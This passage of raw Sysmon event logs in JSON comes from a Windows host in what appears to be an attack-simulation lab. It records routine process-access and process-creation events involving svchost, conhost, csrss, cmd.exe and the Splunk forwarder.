07:55:35.298","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3637,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-00107D900500}\r\nTargetProcessId: 3588\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-00107D900500}","TargetProcessId":"3588","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3638,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.411\r\nProcessGuid: {41C8662E-1FF7-5F25-0000-00100F960500}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.411","ProcessGuid":"{41C8662E-1FF7-5F25-0000-00100F960500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3639,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-00100F960500}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-00100F960500}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3640,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-00100F960500}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-00100F960500}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3641,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3642,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3643,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3644,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3645,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 